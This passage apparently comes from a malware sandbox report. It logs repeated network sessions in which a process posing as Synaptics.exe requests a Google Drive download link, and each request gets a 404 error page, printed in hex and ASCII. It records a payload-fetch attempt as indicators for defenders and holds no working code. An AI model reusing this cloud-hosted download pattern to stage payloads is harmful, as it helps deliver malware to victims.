                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vA+1v6zTlvpMGq7mW6K3zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC831INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 65 71 46 31 5a 46 43 7a 66 74 69 52 47 64 45 50 32 65 51 65 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UeqF1ZFCzftiRGdEP2eQeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:05 UTC832INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:05 UTC832INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        274192.168.2.350060142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC829OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC832INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-J7wOWYmNpw6cwDhD1+QyFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC834INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:05 UTC834INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 6f 52 69 78 68 33 46 38 50 70 6b 71 49 39 4a 41 63 78 51 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="roRixh3F8PpkqI9JAcxQnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:05 UTC835INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:05 UTC835INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        275192.168.2.350061142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC832OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC835INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-33ZsobbpJ7tMgQFqBXHg1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC837INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 4d 35 36 6c 79 57 2f 63 4b 71 72 39 54 4e 69 4e 49 64 74 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hM56lyW/cKqr9TNiNIdteQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:05 UTC838INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:05 UTC838INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        276192.168.2.350062142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC835OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:05 UTC838INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:05 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VKin7ILfdfzJnErrkRx0pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:05 UTC840INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:05 UTC840INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 44 57 79 54 33 4a 75 74 2f 6f 70 2f 41 42 69 2b 79 31 4a 52 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UDWyT3Jut/op/ABi+y1JRQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:05 UTC841INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:05 UTC841INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        277192.168.2.350065142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:05 UTC838OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC841INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PIVxaof0aOE8c5ZmhAkaeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC843INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:06 UTC843INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 66 42 46 55 2f 73 54 6c 55 49 73 41 46 57 4a 58 45 41 43 59 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DfBFU/sTlUIsAFWJXEACYQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:06 UTC844INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:06 UTC844INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        278192.168.2.350066142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC841OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC844INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DbejINwPymBJli+gJnu1yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
